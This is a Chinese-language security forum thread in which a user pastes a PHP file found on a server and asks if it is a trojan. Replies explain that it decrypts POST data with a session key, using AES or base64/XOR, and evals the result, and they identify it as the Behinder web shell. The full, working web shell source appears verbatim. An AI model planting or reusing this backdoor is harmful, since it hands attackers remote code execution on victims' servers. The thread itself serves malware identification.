[求助]这是木马么？-求助问答-看雪-安全社区|安全招聘|kanxue.com

未解决 [求助]这是木马么？

2021-3-9 13:53 5772

未解决 [求助]这是木马么？

wx_三五瓶

2021-3-9 13:53

5772

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
 
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>

这应该是木马吧，但是我没看懂是怎么连接访问的，有老哥解释一下吗

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

收藏・0

免费・0

打赏

最新回复 (4)
不对雪币： 6813 活跃值： (2706) 能力值： ( LV4，RANK：52 ) 在线值：发帖 4 回帖 109 粉丝 29 关注私信	不对 2021-3-9 15:27 2 楼 0 有这个eval，大概率是个木马，根据我一天没学过php的理解，大概意思是会先通过get方式加载一个pass的参数，里面的是后续的秘钥key，存入session里面，再通过POST的方式上传一个执行代码，openssl加载成功的话就用AES128结合key进行解密，如果没加载成功就用base64decode + 异或解密，最后eval执行
Genes 雪币： 13033 活跃值： (8578) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 146 粉丝 1 关注私信	Genes 2021-3-9 15:54 3 楼 0 冰蝎的php一句话木马(虽然它好几句~)
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2021-3-9 18:16 4 楼 0 不对有这个eval，大概率是个木马，根据我一天没学过php的理解，大概意思是会先通过get方式加载一个pass的参数，里面的是后续的秘钥key，存入session里面，再通过POST的方式上传一个执行代码 ... 多谢老哥的解答
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2021-3-9 18:17 5 楼 0 Genes 冰蝎的php一句话木马(虽然它好几句~) 多谢多谢，我去研究看看
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复